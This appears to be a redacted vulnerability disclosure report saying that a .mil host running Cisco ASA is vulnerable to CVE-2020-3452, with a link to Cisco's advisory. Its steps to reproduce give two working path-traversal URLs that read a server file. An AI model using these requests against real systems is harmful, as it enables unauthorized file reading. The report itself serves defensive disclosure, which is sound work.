i found out that https://█████████/ was vulnerable to CVE-2020-3452
The IP has a SSL certificate pointing to █████████
curl -kv https://██████████/
Output
Server certificate:
* subject: C=US; ████.mil
Impact
Anyone can read any file present on the server.
System Host(s)
███
Affected Product(s) and Version(s)
CVE Numbers
CVE-2020-3452
Steps to Reproduce
You can test it by visiting the URL:
- https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2BCSCOE%2B/portal_inc.lua
- https://███████/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../
Suggested Mitigation/Remediation Actions
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86